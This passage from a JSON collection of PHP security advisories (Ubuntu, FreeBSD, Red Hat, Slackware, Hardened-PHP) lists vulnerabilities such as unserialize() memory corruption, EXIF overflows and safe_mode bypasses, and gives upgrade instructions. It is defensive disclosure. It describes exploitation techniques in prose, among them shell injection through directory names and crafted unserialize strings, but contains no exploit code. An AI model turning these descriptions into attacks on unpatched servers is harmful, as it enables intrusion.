that PHP incorrectly handled certain pascal strings in the fileinfo extension. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-9652)\n\nAlex Eubanks discovered that PHP incorrectly handled EXIF data in JPEG images. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0232)\n\nIt was discovered that the PHP opcache component incorrectly handled memory. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-1351)\n\nIt was discovered that the PHP PostgreSQL database extension incorrectly handled certain pointers. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-1352)", "modified": "2015-02-17T00:00:00", "published": "2015-02-17T00:00:00", "id": "USN-2501-1", "href": "https://usn.ubuntu.com/2501-1/", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:16:05", "bulletinFamily": "unix", "description": "\nSecunia reports:\n\nMultiple vulnerabilities have been reported in PHP,\n\t which can be exploited to gain escalated privileges,\n\t bypass certain security restrictions, gain knowledge\n\t of sensitive information, or compromise a vulnerable\n\t system.\n\n", "modified": "2004-12-18T00:00:00", "published": "2004-12-16T00:00:00", "id": "D47E9D19-5016-11D9-9B5F-0050569F0001", "href": "https://vuxml.freebsd.org/freebsd/d47e9d19-5016-11d9-9b5f-0050569f0001.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:57", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA double-free bug was found in the deserialization code of PHP. PHP\napplications use the unserialize function on untrusted user data, which\ncould allow a remote attacker to gain access to memory or potentially\nexecute arbitrary code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-1019 to this issue.\n\nFlaws were found in the pack and unpack PHP functions. These functions\ndo not normally pass user supplied data, so they would require a malicious\nPHP script to be exploited. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-1018 to this issue.\n\nA bug was discovered in the initialization of the OpenSSL library, such\nthat the curl extension could not be used to perform HTTP requests over SSL\nunless the php-imap package was installed.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2018-03-14T19:28:10", "published": "2005-01-19T05:00:00", "id": "RHSA-2005:031", "href": "https://access.redhat.com/errata/RHSA-2005:031", "type": "redhat", "title": "(RHSA-2005:031) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:04", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nFlaws including possible information disclosure, double free, and negative\nreference index array underflow were found in the deserialization code of\nPHP. PHP applications may use the unserialize function on untrusted user\ndata, which could allow a remote attacker to gain access to memory or\npotentially execute arbitrary code. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1019 to\nthis issue.\n\nA flaw in the exif extension of PHP was found which lead to a stack\noverflow. An attacker could create a carefully crafted image file in such\na way which, if parsed by a PHP script using the exif extension, could\ncause a crash or potentially execute arbitrary code. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-1065 to this issue.\n\nFlaws were found in shmop_write, pack, and unpack PHP functions. These\nfunctions are not normally passed user supplied data, so would require a\nmalicious PHP script to be exploited. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1018 to\nthis issue.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2017-09-08T11:51:21", "published": "2005-02-15T05:00:00", "id": "RHSA-2005:032", "href": "https://access.redhat.com/errata/RHSA-2005:032", "type": "redhat", "title": "(RHSA-2005:032) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:55", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nFlaws including possible information disclosure, double free, and negative\nreference index array underflow were found in the deserialization code of\nPHP. PHP applications may use the unserialize function on untrusted user\ndata, which could allow a remote attacker to gain access to memory or\npotentially execute arbitrary code. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1019 to\nthis issue.\n\nA flaw in the exif extension of PHP was found which lead to a stack\noverflow. An attacker could create a carefully crafted image file in such\na way that if parsed by a PHP script using the exif extension it could\ncause a crash or potentially execute arbitrary code. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-1065 to this issue.\n\nAn information disclosure bug was discovered in the parsing of \"GPC\"\nvariables in PHP (query strings or cookies, and POST form data). If\nparticular scripts used the values of the GPC variables, portions of the\nmemory space of an httpd child process could be revealed to the client. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0958 to this issue.\n\nA file access bug was discovered in the parsing of \"multipart/form-data\"\nforms, used by PHP scripts which allow file uploads. In particular\nconfigurations, some scripts could allow a malicious client to upload files\nto an arbitrary directory where the \"apache\" user has write access. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0959 to this issue.\n\nFlaws were found in shmop_write, pack, and unpack PHP functions. These\nfunctions are not normally passed user supplied data, so would require a\nmalicious PHP script to be exploited. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1018 to\nthis issue.\n\nVarious issues were discovered in the use of the \"select\" system call in\nPHP, which could be triggered if PHP is used in an Apache configuration\nwhere the number of open files (such as virtual host log files) exceeds the\ndefault process limit of 1024. Workarounds are now included for some of\nthese issues.\n\nThe \"phpize\" shell script included in PHP can be used to build third-party\nextension modules. A build issue was discovered in the \"phpize\" script on\nsome 64-bit platforms which prevented correct operation.\n\nThe \"pcntl\" extension module is now enabled in the command line PHP\ninterpreter, /usr/bin/php. This module enables process control features \nsuch as \"fork\" and \"kill\" from PHP scripts.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2017-07-29T20:27:18", "published": "2004-12-21T05:00:00", "id": "RHSA-2004:687", "href": "https://access.redhat.com/errata/RHSA-2004:687", "type": "redhat", "title": "(RHSA-2004:687) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:45:44", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.", "modified": "2018-03-14T19:26:00", "published": "2005-11-10T05:00:00", "id": "RHSA-2005:838", "href": "https://access.redhat.com/errata/RHSA-2005:838", "type": "redhat", "title": "(RHSA-2005:838) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T21:42:31", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. The php55 packages provide a recent stable release of PHP with\nthe PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a\nnumber of additional utilities.\n\nThe php55 packages have been upgraded to upstream version 5.5.21, which\nprovides multiple bug fixes over the version shipped in Red Hat Software\nCollections 1. (BZ#1057089)\n\nThe following security issues were fixed in the php55-php component:\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA heap buffer overflow flaw was found in PHP's regular expression\nextension. An attacker able to make PHP process a specially crafted regular\nexpression pattern could cause it to crash and possibly execute arbitrary\ncode. (CVE-2015-2305)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA use-after-free flaw was found in PHP's OPcache extension. This flaw could\npossibly lead to a disclosure of a portion of the server memory.\n(CVE-2015-1351)\n\nA use-after-free flaw was found in PHP's phar (PHP Archive) extension.\nAn attacker able to trigger certain error condition in phar archive\nprocessing could possibly use this flaw to disclose certain portions of\nserver memory. (CVE-2015-2301)\n\nAn ouf-of-bounds read flaw was found in the way the File Information\n(fileinfo) extension processed certain Pascal strings. A remote attacker\ncould cause a PHP application to crash if it used fileinfo to identify the\ntype of the attacker-supplied file. (CVE-2014-9652)\n\nIt was found that PHP move_uploaded_file() function did not properly handle\nfile names with a NULL character. A remote attacker could possibly use this\nflaw to make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348)\n\nA NULL pointer dereference flaw was found in PHP's pgsql extension. A\nspecially crafted table name passed to a function such as pg_insert() or\npg_select() could cause a PHP application to crash. (CVE-2015-1352)\n\nA flaw was found in the way PHP handled malformed source files when running\nin CGI mode. A specially crafted PHP file could cause PHP CGI to crash.\n(CVE-2014-9427)\n\nAll php55 users are advised to upgrade to these updated packages, which\ncorrect these issues. After installing the updated packages, the\nhttpd24-httpd service must be restarted for the update to take effect.\n", "modified": "2018-06-13T01:28:18", "published": "2015-06-04T04:00:00", "id": "RHSA-2015:1053", "href": "https://access.redhat.com/errata/RHSA-2015:1053", "type": "redhat", "title": "(RHSA-2015:1053) Moderate: php55 security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T19:43:26", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. The php54 packages provide a recent stable release of PHP with\nthe PEAR 1.9.4, APC 3.1.15, and memcache 3.0.8 PECL extensions, and a\nnumber of additional utilities.\n\nThe php54 packages have been upgraded to upstream version 5.4.40, which\nprovides a number of bug fixes over the version shipped in Red Hat Software\nCollections 1. (BZ#1168193)\n\nThe following security issues were fixed in the php54-php component:\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA heap buffer overflow flaw was found in PHP's regular expression\nextension. An attacker able to make PHP process a specially crafted regular\nexpression pattern could cause it to crash and possibly execute arbitrary\ncode. (CVE-2015-2305)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA use-after-free flaw was found in PHP's phar (PHP Archive) extension.\nAn attacker able to trigger certain error condition in phar archive\nprocessing could possibly use this flaw to disclose certain portions of\nserver memory. (CVE-2015-2301)\n\nAn ouf-of-bounds read flaw was found in the way the File Information\n(fileinfo) extension processed certain Pascal strings. A remote attacker\ncould cause a PHP application to crash if it used fileinfo to identify the\ntype of the attacker-supplied file. (CVE-2014-9652)\n\nIt was found that PHP move_uploaded_file() function did not properly handle\nfile names with a NULL character. A remote attacker could possibly use this\nflaw to make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348)\n\nA flaw was found in the way PHP handled malformed source files when running\nin CGI mode. A specially crafted PHP file could cause PHP CGI to crash.\n(CVE-2014-9427)\n\nThe following security issue was fixed in the php54-php-pecl-zendopcache\ncomponent:\n\nA use-after-free flaw was found in PHP's OPcache extension. This flaw could\npossibly lead to a disclosure of a portion of the server memory.\n(CVE-2015-1351)\n\nAll php54 users are advised to upgrade to these updated packages, which\ncorrect these issues. After installing the updated packages, the httpd\nservice must be restarted for the update to take effect.\n", "modified": "2018-06-13T01:28:17", "published": "2015-06-04T04:00:00", "id": "RHSA-2015:1066", "href": "https://access.redhat.com/errata/RHSA-2015:1066", "type": "redhat", "title": "(RHSA-2015:1066) Important: php54 security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:41:45", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption.\n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "modified": "2018-04-12T03:33:12", "published": "2015-06-23T04:00:00", "id": "RHSA-2015:1135", "href": "https://access.redhat.com/errata/RHSA-2015:1135", "type": "redhat", "title": "(RHSA-2015:1135) Important: php security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[slackware-security] php &#40;SSA:2014-356-02&#41;\r\n\r\nNew php packages are available for Slackware 14.0, 14.1, and -current to\r\nfix security issues.\r\n\r\n\r\nHere are the details from the Slackware 14.1 ChangeLog:\r\n+--------------------------+\r\npatches/packages/php-5.4.36-i486-1_slack14.1.txz: Upgraded.\r\n This update fixes bugs and security issues.\r\n #68545 &#40;NULL pointer dereference in unserialize.c&#41;.\r\n #68594 &#40;Use after free vulnerability in unserialize&#40;&#41;&#41;. &#40;CVE-2014-8142&#41;\r\n #68283 &#40;fileinfo: out-of-bounds read in elf note headers&#41;. &#40;CVE-2014-3710&#41;\r\n For more information, see:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142\r\n &#40;* Security fix *&#41;\r\n+--------------------------+\r\n\r\n\r\nWhere to find the new packages:\r\n+-----------------------------+\r\n\r\nThanks to the friendly folks at the OSU Open Source Lab\r\n&#40;http://osuosl.org&#41; for donating FTP and rsync hosting\r\nto the Slackware project! \r\n\r\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\r\nadditional mirror sites near you.\r\n\r\nUpdated package for Slackware 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.36-i486-1_slack14.0.txz\r\n\r\nUpdated package for Slackware x86_64 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.36-x86_64-1_slack14.0.txz\r\n\r\nUpdated package for Slackware 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.36-i486-1_slack14.1.txz\r\n\r\nUpdated package for Slackware x86_64 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.36-x86_64-1_slack14.1.txz\r\n\r\nUpdated package for Slackware -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.4.36-i486-1.txz\r\n\r\nUpdated package for Slackware x86_64 -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.4.36-x86_64-1.txz\r\n\r\n\r\nMD5 signatures:\r\n+-------------+\r\n\r\nSlackware 14.0 package:\r\nd25a3e243ec1921b7ac321be40336251 php-5.4.36-i486-1_slack14.0.txz\r\n\r\nSlackware x86_64 14.0 package:\r\nc374f5fef8a922ee1718232be4baefbf php-5.4.36-x86_64-1_slack14.0.txz\r\n\r\nSlackware 14.1 package:\r\n365000d20e974b045b2acc143ba6dfbe php-5.4.36-i486-1_slack14.1.txz\r\n\r\nSlackware x86_64 14.1 package:\r\n81fc269537befcc2fcb3be913588d8cc php-5.4.36-x86_64-1_slack14.1.txz\r\n\r\nSlackware -current package:\r\nbce0dc50b1430ed7a521b07795763922 n/php-5.4.36-i486-1.txz\r\n\r\nSlackware x86_64 -current package:\r\n6266e021adac91c16e68e61ee4bcdf9b n/php-5.4.36-x86_64-1.txz\r\n\r\n\r\nInstallation instructions:\r\n+------------------------+\r\n\r\nUpgrade the package as root:\r\n# upgradepkg php-5.4.36-i486-1_slack14.1.txz\r\n\r\nThen, restart Apache httpd:\r\n# /etc/rc.d/rc.httpd stop\r\n# /etc/rc.d/rc.httpd start\r\n\r\n\r\n+-----+\r\n\r\nSlackware Linux Security Team\r\nhttp://slackware.com/gpg-key\r\nsecurity@slackware.com\r\n\r\n+------------------------------------------------------------------------+\r\n| To leave the slackware-security mailing list: |\r\n+------------------------------------------------------------------------+\r\n| Send an email to majordomo@slackware.com with this text in the body of |\r\n| the email message: |\r\n| |\r\n| unsubscribe slackware-security |\r\n| |\r\n| You will get a confirmation message back containing instructions to |\r\n| complete the process. Please do not reply to this email address. |\r\n+------------------------------------------------------------------------+\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niEYEARECAAYFAlSY3jkACgkQakRjwEAQIjMkjQCfRjzllMps/dUb1k5GlvLY2GIS\r\ntwMAoJK0hs2pJ20qtJjlbTmdsWwWgu+W\r\n=nLns\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-12-23T00:00:00", "published": "2014-12-23T00:00:00", "id": "SECURITYVULNS:DOC:31552", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31552", "title": "[slackware-security] php &#40;SSA:2014-356-02&#41;", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Hardened-PHP Project\r\n www.hardened-php.net\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: Multiple vulnerabilities within PHP 4/5\r\n Release Date: 2004/12/15\r\nLast Modified: 2004/12/15\r\n Author: Stefan Esser [sesser@php.net]\r\n\r\n Application: PHP4 &lt;= 4.3.9\r\n PHP5 &lt;= 5.0.2\r\n Severity: Several vulnerabilities within PHP allow \r\n local and remote execution of arbitrary code\r\n Risk: Critical\r\nVendor Status: Vendor has released bugfixed versions.\r\n References: http://www.hardened-php.net/advisories/012004.txt\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n especially suited for Web development and can be embedded into HTML.\r\n\r\n During the development of Hardened-PHP which adds security hardening\r\n features to the PHP codebase, several vulnerabilities within PHP \r\n were discovered that reach from bufferoverflows, over information \r\n leak vulnerabilities and path truncation vulnerabilities to\r\n safe_mode restriction bypass vulnerabilities.\r\n \r\n\r\nDetails:\r\n\r\n [01 - pack&#40;&#41; - integer overflow leading to heap bufferoverflow ]\r\n \r\n Insufficient validation of the parameters passed to pack&#40;&#41; can\r\n lead to a heap overflow which can be used to execute arbitrary\r\n code from within a PHP script. This enables an attacker to\r\n bypass safe_mode restrictions and execute arbitrary code with\r\n the permissions of the webserver. Due to the nature of this\r\n function it is unlikely that a script accidently exposes it to\r\n remote attackers.\r\n \r\n [02 - unpack&#40;&#41; - integer overflow leading to heap info leak ]\r\n\r\n Insufficient validation of the parameters passed to unpack&#40;&#41; can\r\n lead to a heap information leak which can be used to retrieve\r\n secret data from the apache process. Additionally a skilled\r\n local attacker could use this vulnerability in combination with\r\n 01 to bypass heap canary protection systems. Similiar to 01 this\r\n function is usually not used on user supplied data within\r\n webapplications.\r\n\r\n [03 - safe_mode_exec_dir bypass in multithreaded PHP ]\r\n \r\n When safe_mode is activated within PHP, it is only allowed to\r\n execute commands within the configured safe_mode_exec_dir. \r\n Unfourtunately PHP does prepend a &quot;cd [currentdir] ;&quot; to any\r\n executed command when a PHP is running on a multithreaded unix\r\n webserver &#40;f.e. some installations of Apache2&#41;. Because the name\r\n of the current directory is prepended directly a local attacker\r\n may bypass safe_mode_exec_dir restrictions by injecting shell-\r\n commands into the current directory name.\r\n \r\n [04 - safe_mode bypass through path truncation ]\r\n \r\n The safe_mode checks silently truncated the file path at MAXPATHLEN\r\n bytes before passing it to realpath&#40;&#41;. In combination with certain\r\n malfunctional implementations of realpath&#40;&#41; f.e. within glibc this\r\n allows crafting a filepath that pass the safe_mode check although\r\n it points to a file that should fail the safe_mode check.\r\n \r\n [05 - path truncation in realpath&#40;&#41; ]\r\n \r\n PHP uses realpath&#40;&#41; within several places to get the real path\r\n of files. Unfourtunately some implementations of realpath&#40;&#41; silently\r\n truncate overlong filenames &#40;f.e. OpenBSD, and older NetBSD/FreeBSD&#41;\r\n This can lead to arbitrary file include vulnerabilities if something\r\n like &quot;include &quot;modules/$userinput/config.inc.php&quot;; is used on such\r\n systems.\r\n \r\n [06 - unserialize&#40;&#41; - wrong handling of negative references ]\r\n \r\n The variable unserializer could be fooled with negative references\r\n to add false zvalues to hashtables. When those hashtables get\r\n destroyed this can lead to efree&#40;&#41;s of arbitrary memory addresses\r\n which can result in arbitrary code execution. &#40;Unless Hardened-PHP&#39;s\r\n memory manager canaries are activated&#41;\r\n \r\n [07 - unserialize&#40;&#41; - wrong handling of references to freed data ]\r\n \r\n Additionally to bug 07 the previous version of the variable \r\n unserializer allowed setting references to already freed entries in\r\n the variable hash. A skilled attacker can exploit this to create \r\n an universal string that will pass execution to an arbitrary \r\n memory address when it is passed to unserialize&#40;&#41;. For AMD64 systems\r\n a string was developed that directly passes execution to code \r\n contained in the string itself.\r\n \r\n It is necessary to understand that these strings can exploit a \r\n bunch of popular PHP applications remotely because they pass f.e.\r\n cookie content to unserialize&#40;&#41;.\r\n \r\n Examples of vulnerable scripts:\r\n \r\n - phpBB2\r\n - Invision Board\r\n - vBulletin\r\n - Woltlab Burning Board 2.x\r\n - Serendipity Weblog\r\n - phpAds&#40;New&#41;\r\n - ...\r\n\r\n\r\nProof of Concept:\r\n\r\n The Hardened-PHP project is not going to release exploits for any \r\n of these vulnerabilities to the public.\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41; has\r\n assigned the name CAN-2004-1018 to issues 01, 02, the name \r\n CAN-2004-1019 to issues 06, 07, the name CAN-2004-1063 to issue 03\r\n and the name CAN-2004-1064 to issues 04, 05.\r\n\r\n\r\nRecommendation:\r\n\r\n It is strongly recommended to upgrade to the new PHP-Releases as\r\n soon as possible, because a lot of PHP applications expose the\r\n easy to exploit unserialize&#40;&#41; vulnerability to remote attackers.\r\n Additionally we always recommend to run PHP with the Hardened-PHP\r\n patch applied.\r\n \r\n\r\nGPG-Key:\r\n\r\n http://www.hardened-php.net/hardened-php-signature-key.asc\r\n\r\n pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key\r\n Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 &#40;GNU/Linux&#41;\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFBwDo7RDkUzAqGSqERAgVxAKC0LnTE49y5HFjeXpwXrZmAjuCL8gCgpQUl\r\nrtmmBfJ3iv9Ksb/xtnyflD0=\r\n=lzXX\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2004-12-16T00:00:00", "published": "2004-12-16T00:00:00", "id": 